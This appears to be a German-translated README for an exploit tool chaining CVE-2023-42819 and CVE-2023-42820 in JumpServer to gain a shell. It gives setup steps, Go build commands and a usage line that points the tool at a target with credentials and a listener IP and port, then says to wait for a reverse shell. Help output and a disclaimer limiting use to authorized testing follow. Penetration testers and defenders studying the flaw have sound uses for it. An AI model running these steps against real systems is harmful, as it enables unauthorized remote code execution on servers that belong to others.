
CVE-2023-42819
CVE-2023-42819
JumpServer Schwachstelle zum Schreiben beliebiger Dateien
CVE-2023-42819 + CVE-2023-42820 = GetShell
Legen Sie das Skript und die erforderlichen Dateien in dasselbe Verzeichnis.
Stellen Sie sicher, dass Google Chrome installiert ist, und ermitteln Sie die Versionsnummer von Google Chrome.
reg query "HKEY_CURRENT_USER\Software\Google\Chrome\BLBeacon" /v version
Laden Sie entsprechend der Google Chrome-Version und des Systems den chromedriver herunter und platzieren Sie ihn im webdriver-Verzeichnis.
Neueste Version: https://googlechromelabs.github.io/chrome-for-testing/
Historische Versionen: https://chromedriver.chromium.org/downloads/version-selection
So viele Anforderungen : (
Hören Sie auf der entsprechenden IP und Port und warten Sie auf eine Reverse Shell.
██████╗██╗ ██╗███████╗ ██████╗ ██████╗ ██████╗ ██████╗ ██╗ ██╗██████╗ █████╗ ██╗ █████╗
██╔════╝██║ ██║██╔════╝ ╚════██╗██╔═████╗╚════██╗╚════██╗ ██║ ██║╚════██╗██╔══██╗███║██╔══██╗
██║ ██║ ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝ █████╔╝█████╗███████║ █████╔╝╚█████╔╝╚██║╚██████║
██║ ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚═══██╗╚════╝╚════██║██╔═══╝ ██╔══██╗ ██║ ╚═══██║
╚██████╗ ╚████╔╝ ███████╗ ███████╗╚██████╔╝███████╗██████╔╝ ██║███████╗╚█████╔╝ ██║ █████╔╝
╚═════╝ ╚═══╝ ╚══════╝ ╚══════╝ ╚═════╝ ╚══════╝╚═════╝ ╚═╝╚══════╝ ╚════╝ ╚═╝ ╚════╝
@Auth: C1ph3rX13
@Blog: https://c1ph3rx13.github.io
@Note: Der Code dient nur zu Lernzwecken, bitte nicht für andere Zwecke verwenden.
usage: CVE-2023-42819-Fin.py [-h] -t TARGET -u USERNAME -p PASSWORD --ip IP --port PORT [--proxy PROXY]
CVE-2023-42819 by C1ph3rX13.
optional arguments:
-h, --help show this help message and exit
-t TARGET, --target TARGET
target url
-u USERNAME, --username USERNAME
account username
-p PASSWORD, --password PASSWORD
account password
--ip IP shell ip
--port PORT shell port
--proxy PROXY proxy to http://ip:port


go mod init CVE-2023-42819
go mod tidy
go build -ldflags="-s -w" -trimpath
.\CVE-2023-42819.exe -t http://IP:Port -u username -p password -ip IP -port Port -proxy proxyUrl
██████╗██╗ ██╗███████╗ ██████╗ ██████╗ ██████╗ ██████╗ ██╗ ██╗██████╗ █████╗ ██╗ █████╗
██╔════╝██║ ██║██╔════╝ ╚════██╗██╔═████╗╚════██╗╚════██╗ ██║ ██║╚════██╗██╔══██╗███║██╔══██╗
██║ ██║ ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝ █████╔╝█████╗███████║ █████╔╝╚█████╔╝╚██║╚██████║
██║ ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝ ╚═══██╗╚════╝╚════██║██╔═══╝ ██╔══██╗ ██║ ╚═══██║
╚██████╗ ╚████╔╝ ███████╗ ███████╗╚██████╔╝███████╗██████╔╝ ██║███████╗╚█████╔╝ ██║ █████╔╝
╚═════╝ ╚═══╝ ╚══════╝ ╚══════╝ ╚═════╝ ╚══════╝╚═════╝ ╚═╝╚══════╝ ╚════╝ ╚═╝ ╚════╝
@Auth: C1ph3rX13
@Blog: https://c1ph3rx13.github.io
@Note: Der Code dient nur zu Lernzwecken, bitte nicht für andere Zwecke verwenden.
Usage of CVE-2023-42819.exe:
-ip string
Shell IP
-p string
Account Password
-port string
Shell Port
-proxy string
Proxy Url
-t string
Target Url
-u string
Account Username

http, https, socks hinzugefügtDieses Tool richtet sich ausschließlich an Sicherheitspersonal für Penetrationstests mit rechtmäßiger Autorisierung und an Netzwerkadministratoren, die Routineaufgaben durchführen. Benutzer dürfen es unter der Bedingung einer ausreichenden rechtmäßigen Autorisierung und nichtkommerziellen Nutzung herunterladen, kopieren, verbreiten oder verwenden.
Bei der Nutzung dieses Tools müssen Sie sicherstellen, dass alle Ihre Handlungen den örtlichen Gesetzen und Vorschriften entsprechen, und dieses Tool nicht für Aktivitäten verwenden, die gegen die Gesetze der Volksrepublik China verstoßen. Alle Autoren und Mitwirkenden dieses Tools übernehmen keine Haftung für rechtswidrige Aktivitäten, die durch die unbefugte Nutzung dieses Tools durch Benutzer entstehen.